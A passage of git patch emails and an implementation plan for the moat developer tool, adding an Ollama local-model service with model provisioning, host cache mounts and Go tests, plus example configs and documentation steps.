%w", err) + } + cacheHostPath = filepath.Join(homeDir, ".moat", "cache", dep.Name) + } + + return container.ServiceConfig{ + Name: dep.Name, + Version: dep.Version, + Env: env, + RunID: runID, + Image: spec.Service.Image, + Ports: spec.Service.Ports, + PasswordEnv: spec.Service.PasswordEnv, + ExtraCmd: spec.Service.ExtraCmd, + ReadinessCmd: spec.Service.ReadinessCmd, + CachePath: spec.Service.CachePath, + CacheHostPath: cacheHostPath, + Provisions: provisions, + ProvisionCmd: spec.Service.ProvisionCmd, + }, nil +} +``` + +Add `"os"` and `"path/filepath"` to the imports in `services.go`. + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `go test ./internal/run/ -run "TestBuildServiceConfigOllama|TestBuildServiceConfigNoPassword|TestBuildServiceConfigPostgresStillHas|TestBuildServiceConfigValidatesProvisionsKey" -v` +Expected: PASS + +- [ ] **Step 5: Run all run package tests** + +Run: `go test ./internal/run/ -v -count=1` +Expected: All PASS (existing postgres/redis/mysql tests must still pass) + +- [ ] **Step 6: Commit** + +```bash +git add internal/run/services.go internal/run/services_test.go +git commit -m "feat(run): wire provisions, cache, and password guard into buildServiceConfig" +``` + +--- + +### Task 6: Add provisionService function and wire into manager + +**Files:** +- Modify: `internal/run/services.go` (add provisionService) +- Modify: `internal/run/services_test.go` (add tests) +- Modify: `internal/run/manager.go:1922-1948` (wire provisioning after readiness) + +- [ ] **Step 1: Write failing test for provisionService** + +Add to `internal/run/services_test.go`: + +```go +func TestProvisionServiceBuildsCommands(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) + assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) +} + +func TestProvisionServiceEmptyList(t *testing.T) { + cmds := buildProvisionCmds("ollama pull {item}", nil) + assert.Empty(t, cmds) +} + +func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "plugins": {"pg_trgm"}, + }, + } + + _, err := buildServiceConfig(dep, "run-pg", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "plugins") + assert.Contains(t, err.Error(), "not a valid") +} +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `go test ./internal/run/ -run "TestProvisionService" -v` +Expected: FAIL — `buildProvisionCmds` doesn't exist + +- [ ] **Step 3: Implement provisionService and buildProvisionCmds** + +Add to `internal/run/services.go`: + +```go +const provisionTimeout = 30 * time.Minute + +// buildProvisionCmds creates concrete commands from a template and item list. +func buildProvisionCmds(cmdTemplate string, items []string) []string { + if len(items) == 0 { + return nil + } + cmds := make([]string, len(items)) + for i, item := range items { + cmds[i] = strings.ReplaceAll(cmdTemplate, "{item}", item) + } + return cmds +} + +// provisionService runs provision commands inside a started service container. +// Uses flock-based advisory locking on the cache directory to prevent concurrent +// corruption from parallel runs. +func provisionService(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cfg container.ServiceConfig, stdout io.Writer) error { + cmds := buildProvisionCmds(cfg.ProvisionCmd, cfg.Provisions) + if len(cmds) == 0 { + return nil + } + + ctx, cancel := context.WithTimeout(ctx, provisionTimeout) + defer cancel() + + // Advisory lock on cache directory to prevent concurrent pull corruption. + // Cache directory is already created by the manager before starting the sidecar. + if cfg.CacheHostPath != "" { + lockPath := filepath.Join(cfg.CacheHostPath, ".lock") + lockFile, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644) + if err != nil { + return fmt.Errorf("opening cache lock %s: %w", lockPath, err) + } + defer lockFile.Close() + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) + } + defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() + } + + return mgr.ProvisionService(ctx, info, cmds, stdout) +} +``` + +Add `"io"`, `"os"`, `"syscall"` to the imports. + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `go test ./internal/run/ -run "TestProvisionService" -v` +Expected: PASS + +- [ ] **Step 5: Wire provisioning into manager.go** + +In `internal/run/manager.go`, in the "Wait for readiness" loop (around line 1922-1948), add provisioning after the `waitForServiceReady` call. The modified loop should look like: + +```go + // Wait for readiness and provision + for i, dep := range serviceDeps { + wait := true + if opts.Config != nil { + if s, ok := opts.Config.Services[dep.Name]; ok { + wait = s.ServiceWait() + } + } + if !wait { + continue + } + + info := serviceInfos[i] + log.Debug("waiting for service to be ready", "service", dep.Name) + if err := waitForServiceReady(ctx, svcMgr, info); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s service failed to become ready: %w\n\n"+ + "Service container logs:\n moat logs %s --service %s\n\n"+ + "Or disable wait:\n services:\n %s:\n wait: false", + dep.Name, err, r.ID, dep.Name, dep.Name) + } + + // Provision items (e.g., pull models) if configured + if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) + if err := provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s service provisioning failed: %w\n\n"+ + "Service container logs:\n moat logs %s --service %s", + dep.Name, err, r.ID, dep.Name) + } + } + } +``` + +**Important:** The manager needs to store `ServiceConfig` values to access them in the readiness loop. In the "Start services" loop (around line 1888), save `svcCfg` into a slice: + +Before the loop, add: +```go + var svcConfigs []container.ServiceConfig +``` + +Inside the loop, after `svcCfg, err := buildServiceConfig(...)`, add: +```go + svcConfigs = append(svcConfigs, svcCfg) +``` + +Also, before starting the sidecar, create the cache directory: +```go + // Create cache directory if needed + if svcCfg.CacheHostPath != "" { + if err := os.MkdirAll(svcCfg.CacheHostPath, 0o755); err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating cache directory for %s: %w", dep.Name, err) + } + } +``` + +- [ ] **Step 6: Verify compilation** + +Run: `go build ./...` +Expected: Success + +- [ ] **Step 7: Run all tests** + +Run: `go test ./internal/run/ -v -count=1` +Expected: All PASS + +- [ ] **Step 8: Commit** + +```bash +git add internal/run/services.go internal/run/services_test.go internal/run/manager.go +git commit -m "feat(run): add service provisioning with flock-based cache locking" +``` + +--- + +## Chunk 3: Env generation fix, example, and documentation + +### Task 7: Fix generateServiceEnv for no-auth services + +**Files:** +- Modify: `internal/run/services.go` (generateServiceEnv) +- Modify: `internal/run/services_test.go` (add test) + +- [ ] **Step 1: Write failing test** + +Add to `internal/run/services_test.go`: + +```go +func TestGenerateServiceEnvOllama(t *testing.T) { + spec, ok := deps.GetSpec("ollama") + require.True(t, ok) + + info := container.ServiceInfo{ + Name: "ollama", + Host: "ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + } + + env := generateServiceEnv(spec.Service, info, nil) + + assert.Equal(t, "ollama", env["MOAT_OLLAMA_HOST"]) + assert.Equal(t, "11434", env["MOAT_OLLAMA_PORT"]) + assert.Equal(t, "http://ollama:11434", env["MOAT_OLLAMA_URL"]) + + // No auth — should not have password, user, or db + _, hasPassword := env["MOAT_OLLAMA_PASSWORD"] + assert.False(t, hasPassword, "should not inject password for no-auth services") + _, hasUser := env["MOAT_OLLAMA_USER"] + assert.False(t, hasUser) + _, hasDB := env["MOAT_OLLAMA_DB"] + assert.False(t, hasDB) +} +``` + +- [ ] **Step 2: Run test to verify it passes (or fails)** + +Run: `go test ./internal/run/ -run TestGenerateServiceEnvOllama -v` +Expected: This test should PASS with the current `generateServiceEnv` code since the env map is empty and `PasswordEnv` is empty. The `password` fallback (`info.Env["password"]`) returns empty string, so `MOAT_OLLAMA_PASSWORD` won't be set. If it fails, the password guard in Task 5 already fixed the upstream issue. Verify and move on. + +- [ ] **Step 3: Run all run tests** + +Run: `go test ./internal/run/ -v -count=1` +Expected: All PASS + +- [ ] **Step 4: Commit** + +```bash +git add internal/run/services_test.go +git commit -m "test(run): add env generation test for Ollama no-auth service" +``` + +--- + +### Task 8: Add example + +**Files:** +- Create: `examples/service-ollama/moat.yaml` +- Create: `examples/service-ollama/demo.sh` + +- [ ] **Step 1: Create example moat.yaml** + +Create `examples/service-ollama/moat.yaml`: + +```yaml +# Example: Ollama service dependency +# +# Demonstrates local model inference using Ollama as a service dependency. +# Moat starts an Ollama sidecar, pulls the declared model, and injects +# MOAT_OLLAMA_* environment variables into the agent container. +# +# Run with: +# moat run examples/service-ollama +# +# The demo script queries the Ollama API to list models and generate a response. + +name: service-ollama + +dependencies: + - ollama@0.9 + - curl + +services: + ollama: + models: + - qwen2.5-coder:1.5b + +command: ["sh", "/workspace/demo.sh"] +``` + +- [ ] **Step 2: Create demo script** + +Create `examples/service-ollama/demo.sh`: + +```bash +#!/bin/sh +set -e + +echo "=== Ollama Service Demo ===" +echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" +echo + +echo "--- Available models ---" +curl -s "$MOAT_OLLAMA_URL/api/tags" | head -c 200 +echo +echo + +echo "--- Generating response ---" +curl -s "$MOAT_OLLAMA_URL/api/generate" \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ + | head -c 500 +echo +``` + +- [ ] **Step 3: Commit** + +```bash +git add examples/service-ollama/ +git commit -m "docs(examples): add Ollama service dependency example" +``` + +--- + +### Task 9: Update documentation + +**Files:** +- Modify: `docs/content/guides/08-services.md` +- Modify: `docs/content/reference/06-dependencies.md` +- Modify: `docs/content/reference/02-moat-yaml.md` + +- [ ] **Step 1: Add Ollama to services guide** + +In `docs/content/guides/08-services.md`, add after the Redis example in "Multiple services" section and before "Custom configuration": + +Add an Ollama section after the "Readiness checks" table: + +```markdown +### Ollama (local models) + +Ollama provides local model inference without external API keys: + +\`\`\`yaml +dependencies: + - ollama@0.9 + +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +\`\`\` + +Models are pulled during startup and cached at `~/.moat/cache/ollama/` on the host. Subsequent runs skip the download. + +\`\`\`python +import requests +import os + +url = os.environ["MOAT_OLLAMA_URL"] +resp = requests.post(f"{url}/api/generate", json={ + "model": "qwen2.5-coder:7b", + "prompt": "Write hello world in Go", + "stream": False, +}) +print(resp.json()["response"]) +\`\`\` +``` + +Add Ollama to the readiness table: + +``` +| `ollama` | `ollama list` + pull declared models | +``` + +- [ ] **Step 2: Add Ollama to the dependencies reference** + +In `docs/content/reference/06-dependencies.md`, add ollama to the services section of the dependency registry table. + +- [ ] **Step 3: Document provisions pattern in moat.yaml reference** + +In `docs/content/reference/02-moat-yaml.md`, in the `services:` section, add documentation for the provisions pattern (list-valued keys like `models`). + +- [ ] **Step 4: Commit** + +```bash +git add docs/content/guides/08-services.md docs/content/reference/06-dependencies.md docs/content/reference/02-moat-yaml.md +git commit -m "docs: add Ollama service documentation and provisions pattern" +``` + +--- + +### Task 10: Lint and final verification + +- [ ] **Step 1: Run linter** + +Run: `make lint` +Expected: No errors. Fix any issues. + +- [ ] **Step 2: Run all unit tests** + +Run: `make test-unit` +Expected: All PASS + +- [ ] **Step 3: Build** + +Run: `go build ./...` +Expected: Success + +- [ ] **Step 4: Final commit if lint fixes needed** + +```bash +git add -A +git commit -m "style: fix lint issues" +``` From c635491f9e2bfbcd6c7c5c7331fe5357a4a28366 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:30:47 +0000 Subject: [PATCH 02/27] feat(container): add provision and cache fields to ServiceConfig --- internal/container/runtime.go | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/internal/container/runtime.go b/internal/container/runtime.go index 9cb44d3b..aa21fd89 100644 --- a/internal/container/runtime.go +++ b/internal/container/runtime.go @@ -218,6 +218,15 @@ type ServiceConfig struct { PasswordEnv string // Env var containing the password (e.g., "POSTGRES_PASSWORD") ExtraCmd []string // Extra command args with {placeholder} substitution ReadinessCmd string // Command to check if service is ready + + // CachePath is the container-side path for cache mounting (e.g., "/root/.ollama"). + CachePath string + // CacheHostPath is the resolved host-side path (e.g., "~/.moat/cache/ollama/"). + CacheHostPath string + // Provisions is the list of items to provision (e.g., model names). + Provisions []string + // ProvisionCmd is the command template with {item} placeholder. + ProvisionCmd string } // ServiceInfo contains connection details for a started service. From 53b27e7a1a3d9c33163c06f1b8128a1736db06d6 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:31:26 +0000 Subject: [PATCH 03/27] feat(deps): add ollama service and provision/cache fields to ServiceDef Add CachePath, ProvisionsKey, and ProvisionCmd fields to ServiceDef struct to support services that need host-side caching and post-start provisioning. Add ollama as a service dependency using these new fields. --- internal/deps/registry.yaml | 16 ++++++++++++++++ internal/deps/registry_test.go | 20 ++++++++++++++++++++ internal/deps/types.go | 14 ++++++++++++++ 3 files changed, 50 insertions(+) diff --git a/internal/deps/registry.yaml b/internal/deps/registry.yaml index 687ae866..da37a23c 100644 --- a/internal/deps/registry.yaml +++ b/internal/deps/registry.yaml @@ -489,6 +489,22 @@ redis: url_scheme: "redis" url_format: "{scheme}://:{password}@{host}:{port}" +ollama: + description: Ollama local model server + type: service + default: "0.9" + service: + image: ollama/ollama + ports: + default: 11434 + env_prefix: OLLAMA + readiness_cmd: "ollama list" + url_scheme: "http" + url_format: "{scheme}://{host}:{port}" + cache_path: /root/.ollama + provisions_key: models + provision_cmd: "ollama pull {item}" + # Meta dependencies (bundles) go-extras: description: Common Go development tools (gofumpt, govulncheck, goreleaser) diff --git a/internal/deps/registry_test.go b/internal/deps/registry_test.go index 54d99fd1..e07c98d8 100644 --- a/internal/deps/registry_test.go +++ b/internal/deps/registry_test.go @@ -58,6 +58,26 @@ func TestRegistryHasPlaywright(t *testing.T) { } } +func TestRegistryHasOllama(t *testing.T) { + ollama, ok := GetSpec("ollama") + if !ok { + t.Fatal("Registry should have 'ollama'") + } + if ollama.Type != TypeService { + t.Errorf("ollama.Type = %v, want %v", ollama.Type, TypeService) + } + if ollama.Service == nil { + t.Fatal("ollama.Service should not be nil") + } + assert.Equal(t, "ollama/ollama", ollama.Service.Image) + assert.Equal(t, 11434, ollama.Service.Ports["default"]) + assert.Equal(t, "OLLAMA", ollama.Service.EnvPrefix) + assert.Equal(t, "/root/.ollama", ollama.Service.CachePath) + assert.Equal(t, "models", ollama.Service.ProvisionsKey) + assert.Equal(t, "ollama pull {item}", ollama.Service.ProvisionCmd) + assert.Empty(t, ollama.Service.PasswordEnv) +} + func TestServiceDepSpec(t *testing.T) { spec, ok := GetSpec("postgres") require.True(t, ok) diff --git a/internal/deps/types.go b/internal/deps/types.go index cd1cda1a..3d7f4874 100644 --- a/internal/deps/types.go +++ b/internal/deps/types.go @@ -116,6 +116,20 @@ type ServiceDef struct { ReadinessCmd string `yaml:"readiness_cmd"` URLScheme string `yaml:"url_scheme"` URLFormat string `yaml:"url_format"` + + // CachePath is the container-side path to mount for host-side caching. + // If set, ~/.moat/cache// is bind-mounted here. + // This allows data to persist across runs (e.g., downloaded models). + CachePath string `yaml:"cache_path,omitempty"` + + // ProvisionsKey names the key in user's services. config that contains + // a list of items to provision (e.g., "models"). Used with ProvisionCmd. + ProvisionsKey string `yaml:"provisions_key,omitempty"` + + // ProvisionCmd is a command template executed once per provision item. + // The placeholder {item} is replaced with each item value. + // Commands run via sh -c inside the service container after readiness. + ProvisionCmd string `yaml:"provision_cmd,omitempty"` } // Dependency represents a parsed dependency from moat.yaml. From 9a8f23e4bbda453f67db93d2f55339016e467ae0 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:33:23 +0000 Subject: [PATCH 04/27] feat(config): add Extra field to ServiceSpec for provision lists --- internal/config/config.go | 38 ++++++++++++++++++++++ internal/config/config_test.go | 58 ++++++++++++++++++++++++++++++++++ 2 files changed, 96 insertions(+) diff --git a/internal/config/config.go b/internal/config/config.go index 43ee631f..73e655a6 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -152,6 +152,44 @@ type ServiceSpec struct { Env map[string]string `yaml:"env,omitempty"` Image string `yaml:"image,omitempty"` Wait *bool `yaml:"wait,omitempty"` + // Extra holds unknown list-valued keys (e.g., "models" for ollama). + // Populated by UnmarshalYAML. The run layer maps these to provisions + // using the registry's provisions_key. + Extra map[string][]string `yaml:"-"` +} + +// UnmarshalYAML implements custom unmarshaling to capture unknown list-valued keys +// into Extra. Known keys (env, image, wait) are parsed normally. +func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { + // First, decode known fields using an alias to avoid recursion. + type plain ServiceSpec + if err := value.Decode((*plain)(s)); err != nil { + return err + } + + // Then scan for unknown keys that have sequence values. + if value.Kind != yaml.MappingNode { + return nil + } + known := map[string]bool{"env": true, "image": true, "wait": true} + for i := 0; i+1 < len(value.Content); i += 2 { + key := value.Content[i].Value + val := value.Content[i+1] + if known[key] { + continue + } + if val.Kind == yaml.SequenceNode { + items := make([]string, 0, len(val.Content)) + for _, item := range val.Content { + items = append(items, item.Value) + } + if s.Extra == nil { + s.Extra = make(map[string][]string) + } + s.Extra[key] = items + } + } + return nil } // ServiceWait returns whether to wait for this service to be ready (default: true). diff --git a/internal/config/config_test.go b/internal/config/config_test.go index ebcb6fd9..8140b90b 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -5,6 +5,10 @@ import ( "path/filepath" "strings" "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "gopkg.in/yaml.v3" ) func TestLoadConfig(t *testing.T) { @@ -2278,3 +2282,57 @@ agent: claude-code } }) } + +func TestServiceSpecUnmarshalWithExtra(t *testing.T) { + input := ` +env: + FOO: bar +wait: false +models: + - qwen2.5-coder:7b + - nomic-embed-text +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "bar", spec.Env["FOO"]) + assert.False(t, spec.ServiceWait()) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, spec.Extra["models"]) +} + +func TestServiceSpecUnmarshalNoExtra(t *testing.T) { + input := ` +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) + assert.Empty(t, spec.Extra) +} + +func TestServiceSpecUnmarshalPreservesImage(t *testing.T) { + input := ` +image: custom-postgres:17 +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "custom-postgres:17", spec.Image) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) +} + +func TestServiceSpecUnmarshalEmptyExtra(t *testing.T) { + input := ` +env: + FOO: bar +models: [] +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Empty(t, spec.Extra["models"]) +} From 137e3d55fe65a749f97bbe6499d2593d1946257b Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:33:50 +0000 Subject: [PATCH 05/27] feat(container): add ProvisionService to ServiceManager interface and cache mount support Adds ProvisionService method to ServiceManager interface for executing provisioning commands inside service containers (e.g., pulling Ollama models). Also adds CachePath/CacheHostPath mount support to both Docker and Apple service managers so model/data caches can be persisted on the host. --- internal/container/apple_service.go | 19 +++++++++++ internal/container/apple_service_test.go | 22 +++++++++++++ internal/container/docker_service.go | 39 +++++++++++++++++++++++ internal/container/docker_service_test.go | 36 +++++++++++++++++++++ internal/container/runtime.go | 5 +++ 5 files changed, 121 insertions(+) diff --git a/internal/container/apple_service.go b/internal/container/apple_service.go index e2f3ace5..b92d5e0a 100644 --- a/internal/container/apple_service.go +++ b/internal/container/apple_service.go @@ -4,6 +4,7 @@ import ( "context" "encoding/json" "fmt" + "io" "os/exec" "sort" "strings" @@ -90,6 +91,19 @@ func (m *appleServiceManager) StopService(ctx context.Context, info ServiceInfo) return nil } +// ProvisionService executes commands sequentially inside the service container. +func (m *appleServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCmd := exec.CommandContext(ctx, m.containerBin, "exec", info.ID, "sh", "-c", cmd) + execCmd.Stdout = stdout + execCmd.Stderr = stdout + if err := execCmd.Run(); err != nil { + return fmt.Errorf("provision command %q failed: %w", cmd, err) + } + } + return nil +} + // getContainerIP inspects a container and returns its IPv4 address on the network. func (m *appleServiceManager) getContainerIP(ctx context.Context, containerID string) (string, error) { cmd := exec.CommandContext(ctx, m.containerBin, "inspect", containerID) @@ -139,6 +153,11 @@ func buildAppleRunArgs(cfg ServiceConfig, networkID string) []string { args = append(args, "--network", networkID) } + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + args = append(args, "--volume", cfg.CacheHostPath+":"+cfg.CachePath) + } + // Sort env keys for deterministic ordering envKeys := make([]string, 0, len(cfg.Env)) for k := range cfg.Env { diff --git a/internal/container/apple_service_test.go b/internal/container/apple_service_test.go index 8ade5c3f..5d91bcb8 100644 --- a/internal/container/apple_service_test.go +++ b/internal/container/apple_service_test.go @@ -114,3 +114,25 @@ func TestGetContainerIPExists(t *testing.T) { // Expected to fail — we just verify the method exists and returns an error assert.Error(t, err) } + +func TestAppleBuildRunArgsWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + args := buildAppleRunArgs(cfg, "moat-test-net") + assert.Contains(t, args, "--volume") + for i, a := range args { + if a == "--volume" && i+1 < len(args) { + assert.Equal(t, "/tmp/test-cache/ollama:/root/.ollama", args[i+1]) + return + } + } + t.Fatal("--volume flag not found in args") +} diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index 60280b78..9e3516d9 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -8,6 +8,7 @@ import ( dockercontainer "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" ) // dockerServiceManager implements ServiceManager using Docker sidecars. @@ -81,6 +82,36 @@ func (m *dockerServiceManager) StopService(ctx context.Context, info ServiceInfo return m.cli.ContainerRemove(ctx, info.ID, dockercontainer.RemoveOptions{Force: true}) } +// ProvisionService executes commands sequentially inside the service container. +func (m *dockerServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCreateResp, err := m.cli.ContainerExecCreate(ctx, info.ID, dockercontainer.ExecOptions{ + Cmd: []string{"sh", "-c", cmd}, + AttachStdout: true, + AttachStderr: true, + }) + if err != nil { + return fmt.Errorf("creating exec for provision command %q: %w", cmd, err) + } + + resp, err := m.cli.ContainerExecAttach(ctx, execCreateResp.ID, dockercontainer.ExecAttachOptions{}) + if err != nil { + return fmt.Errorf("attaching to provision command %q: %w", cmd, err) + } + _, _ = stdcopy.StdCopy(stdout, stdout, resp.Reader) + resp.Close() + + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + } + if execInspect.ExitCode != 0 { + return fmt.Errorf("provision command %q failed with exit code %d", cmd, execInspect.ExitCode) + } + } + return nil +} + // buildSidecarConfig converts a ServiceConfig into a SidecarConfig. func buildSidecarConfig(cfg ServiceConfig, networkID string) SidecarConfig { image := cfg.Image + ":" + cfg.Version @@ -109,6 +140,14 @@ func buildSidecarConfig(cfg ServiceConfig, networkID string) SidecarConfig { }, } + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + sc.Mounts = append(sc.Mounts, MountConfig{ + Source: cfg.CacheHostPath, + Target: cfg.CachePath, + }) + } + if len(cfg.ExtraCmd) > 0 { cmds := make([]string, len(cfg.ExtraCmd)) for i, c := range cfg.ExtraCmd { diff --git a/internal/container/docker_service_test.go b/internal/container/docker_service_test.go index 345a3f43..b5eb478e 100644 --- a/internal/container/docker_service_test.go +++ b/internal/container/docker_service_test.go @@ -4,6 +4,7 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" ) func TestBuildSidecarConfigPostgres(t *testing.T) { @@ -41,3 +42,38 @@ func TestBuildSidecarConfigRedis(t *testing.T) { assert.Equal(t, "redis:7", sidecarCfg.Image) assert.Equal(t, []string{"--requirepass", "redispass"}, sidecarCfg.Cmd) } + +func TestBuildSidecarConfigWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-789") + assert.Equal(t, "ollama/ollama:0.9", sidecarCfg.Image) + assert.Equal(t, "moat-ollama-test-run-789", sidecarCfg.Name) + + require.Len(t, sidecarCfg.Mounts, 1) + assert.Equal(t, "/tmp/test-cache/ollama", sidecarCfg.Mounts[0].Source) + assert.Equal(t, "/root/.ollama", sidecarCfg.Mounts[0].Target) + assert.False(t, sidecarCfg.Mounts[0].ReadOnly) +} + +func TestBuildSidecarConfigNoCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "postgres", + Version: "17", + Image: "postgres", + Env: map[string]string{}, + RunID: "test-run-000", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-000") + assert.Empty(t, sidecarCfg.Mounts) +} diff --git a/internal/container/runtime.go b/internal/container/runtime.go index aa21fd89..9337df93 100644 --- a/internal/container/runtime.go +++ b/internal/container/runtime.go @@ -203,6 +203,11 @@ type ServiceManager interface { CheckReady(ctx context.Context, info ServiceInfo) error StopService(ctx context.Context, info ServiceInfo) error SetNetworkID(id string) + + // ProvisionService executes commands sequentially inside the service container. + // Each command is run via sh -c. stdout receives streaming output for user feedback. + // Returns on first command failure (fail-fast). + ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error } // ServiceConfig defines what service to provision. From b841686b983b0dd524446002b841556a7b5c140d Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:36:35 +0000 Subject: [PATCH 06/27] feat(run): wire provisions, cache, and password guard into buildServiceConfig - Guard password generation: only generate for services that have auth (password_env set, or extra_cmd/readiness_cmd use {password} placeholder) - Wire provisions from userSpec.Extra using registry's provisions_key - Resolve cache host path to ~/.moat/cache/ - Validate unknown extra keys: reject keys that don't match provisions_key --- internal/run/services.go | 117 ++++++++++++++++++++++++++-------- internal/run/services_test.go | 83 ++++++++++++++++++++++++ 2 files changed, 175 insertions(+), 25 deletions(-) diff --git a/internal/run/services.go b/internal/run/services.go index 99ecb517..608305d3 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -5,6 +5,8 @@ import ( "crypto/rand" "fmt" "math/big" + "os" + "path/filepath" "strconv" "strings" "time" @@ -98,6 +100,21 @@ func generateServiceEnv(def *deps.ServiceDef, info container.ServiceInfo, userSp return env } +// serviceUsesPasswordPlaceholder reports whether a service's extra_cmd or +// readiness_cmd contains the {password} placeholder, indicating it needs a +// generated password even when password_env is empty (e.g., Redis). +func serviceUsesPasswordPlaceholder(svc *deps.ServiceDef) bool { + if strings.Contains(svc.ReadinessCmd, "{password}") { + return true + } + for _, arg := range svc.ExtraCmd { + if strings.Contains(arg, "{password}") { + return true + } + } + return false +} + // buildServiceConfig creates a ServiceConfig for a service dependency. // Populates both generic fields and service definition fields from the registry. func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.ServiceSpec) (container.ServiceConfig, error) { @@ -109,25 +126,37 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv return container.ServiceConfig{}, fmt.Errorf("%s has type %q but expected %q", dep.Name, spec.Type, deps.TypeService) } - password, err := generatePassword() - if err != nil { - return container.ServiceConfig{}, err - } - env := make(map[string]string) - // Set password - if spec.Service.PasswordEnv != "" { - env[spec.Service.PasswordEnv] = password - } else { - env["password"] = password - } + // Determine if this service needs a password. + // A service needs auth if it has a named password env var OR if its + // extra_cmd / readiness_cmd reference the {password} placeholder (e.g., Redis). + needsPassword := spec.Service.PasswordEnv != "" || serviceUsesPasswordPlaceholder(spec.Service) - // Set extra_env from registry with placeholder substitution - for k, v := range spec.Service.ExtraEnv { - v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) - v = strings.ReplaceAll(v, "{password}", password) - env[k] = v + // Only generate password for services that have auth + if needsPassword { + password, err := generatePassword() + if err != nil { + return container.ServiceConfig{}, err + } + if spec.Service.PasswordEnv != "" { + env[spec.Service.PasswordEnv] = password + } else { + env["password"] = password + } + + // Set extra_env from registry with placeholder substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + v = strings.ReplaceAll(v, "{password}", password) + env[k] = v + } + } else { + // No auth — still apply extra_env without password substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + env[k] = v + } } // 